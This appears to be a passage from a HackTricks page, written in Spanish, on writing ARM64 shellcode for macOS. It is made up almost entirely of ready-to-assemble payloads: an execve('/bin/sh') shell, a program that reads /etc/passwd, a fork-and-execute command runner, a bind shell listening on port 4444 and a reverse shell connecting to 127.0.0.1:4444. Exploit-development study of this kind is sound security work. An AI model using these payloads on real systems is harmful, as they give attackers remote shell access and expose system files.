.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
; We are going to build the string "/bin/sh" and place it on the stack.
mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'.
movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'.
movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'.
movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'.
str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`.
; Prepare arguments for the execve syscall.
mov x1, #8 ; Set x1 to 8.
sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack.
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
; Make the syscall.
mov x16, #59 ; Move the execve syscall number (59) into x16.
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
{% endtab %}
{% tab title="con adr para linux" %}
; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
adr x0, sh_path ; This is the address of "/bin/sh".
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
mov x16, #59 ; Move the execve syscall number (59) into x16.
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
sh_path: .asciz "/bin/sh"
Leer con cat
El objetivo es ejecutar execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)
, por lo que el segundo argumento (x1) es un array de parámetros (lo que en memoria significa una pila de direcciones).
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
.align 2 ; Align the beginning of the following code to a 4-byte boundary
_main:
; Prepare the arguments for the execve syscall
sub sp, sp, #48 ; Allocate space on the stack
mov x1, sp ; x1 will hold the address of the argument array
adr x0, cat_path
str x0, [x1] ; Store the address of "/bin/cat" as the first argument
adr x0, passwd_path ; Get the address of "/etc/passwd"
str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument
str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments)
adr x0, cat_path
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
mov x16, #59 ; Load the syscall number for execve (59) into x8
svc 0 ; Make the syscall
cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"
Invocar un comando con sh desde un fork para que el proceso principal no sea terminado
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
.align 2 ; Align the beginning of the following code to a 4-byte boundary
_main:
; Prepare the arguments for the fork syscall
mov x16, #2 ; Load the syscall number for fork (2) into x8
svc 0 ; Make the syscall
cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
beq _loop ; If not child process, loop
; Prepare the arguments for the execve syscall
sub sp, sp, #64 ; Allocate space on the stack
mov x1, sp ; x1 will hold the address of the argument array
adr x0, sh_path
str x0, [x1] ; Store the address of "/bin/sh" as the first argument
adr x0, sh_c_option ; Get the address of "-c"
str x0, [x1, #8] ; Store the address of "-c" as the second argument
adr x0, touch_command ; Get the address of "touch /tmp/lalala"
str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument
str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments)
adr x0, sh_path
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
mov x16, #59 ; Load the syscall number for execve (59) into x8
svc 0 ; Make the syscall
_exit:
mov x16, #1 ; Load the syscall number for exit (1) into x8
mov x0, #0 ; Set exit status code to 0
svc 0 ; Make the syscall
_loop: b _loop
sh_path: .asciz "/bin/sh"
.align 2
sh_c_option: .asciz "-c"
.align 2
touch_command: .asciz "touch /tmp/lalala"
Shell de conexión
Shell de conexión desde https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s en el puerto 4444
.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov x16, #97
lsr x1, x16, #6
lsl x0, x1, #1
mov x2, xzr
svc #0x1337
// save s
mvn x3, x0
call_bind:
/*
* bind(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10
* sa_family_t sin_family; // AF_INET = 2
* in_port_t sin_port; // 4444 = 0x115C
* struct in_addr sin_addr; // 0.0.0.0 (4 bytes)
* char sin_zero[8]; // Don't care
* };
*/
mov x1, #0x0210
movk x1, #0x5C11, lsl #16
str x1, [sp, #-8]
mov x2, #8
sub x1, sp, x2
mov x2, #16
mov x16, #104
svc #0x1337
call_listen:
// listen(s, 2)
mvn x0, x3
lsr x1, x2, #3
mov x16, #106
svc #0x1337
call_accept:
// c = accept(s, 0, 0)
mvn x0, x3
mov x1, xzr
mov x2, xzr
mov x16, #30
svc #0x1337
mvn x3, x0
lsr x2, x16, #4
lsl x2, x2, #2
call_dup:
// dup(c, 2) -> dup(c, 1) -> dup(c, 0)
mvn x0, x3
lsr x2, x2, #1
mov x1, x2
mov x16, #90
svc #0x1337
mov x10, xzr
cmp x10, x2
bne call_dup
call_execve:
// execve("/bin/sh", 0, 0)
mov x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str x1, [sp, #-8]
mov x1, #8
sub x0, sp, x1
mov x1, xzr
mov x2, xzr
mov x16, #59
svc #0x1337
Shell inverso
Desde https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s, revshell a 127.0.0.1:4444
.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov x16, #97
lsr x1, x16, #6
lsl x0, x1, #1
mov x2, xzr
svc #0x1337
// save s
mvn x3, x0
call_connect:
/*
* connect(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10
* sa_family_t sin_family; // AF_INET = 2
* in_port_t sin_port; // 4444 = 0x115C
* struct in_addr sin_addr; // 127.0.0.1 (4 bytes)
* char sin_zero[8]; // Don't care
* };
*/
mov x1, #0x0210
movk x1, #0x5C11, lsl #16
movk x1, #0x007F, lsl #32
movk x1, #0x0100, lsl #48
str x1, [sp, #-8]
mov x2, #8
sub x1, sp, x2
mov x2, #16
mov x16, #98
svc #0x1337
lsr x2, x2, #2
call_dup:
// dup(s, 2) -> dup(s, 1) -> dup(s, 0)
mvn x0, x3
lsr x2, x2, #1
mov x1, x2
mov x16, #90
svc #0x1337
mov x10, xzr
cmp x10, x2
bne call_dup
call_execve:
// execve("/bin/sh", 0, 0)
mov x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str x1, [sp, #-8]
mov x1, #8
sub x0, sp, x1
mov x1, xzr
mov x2, xzr
mov x16, #59
svc #0x1337
Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team de AWS de HackTricks)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el swag oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.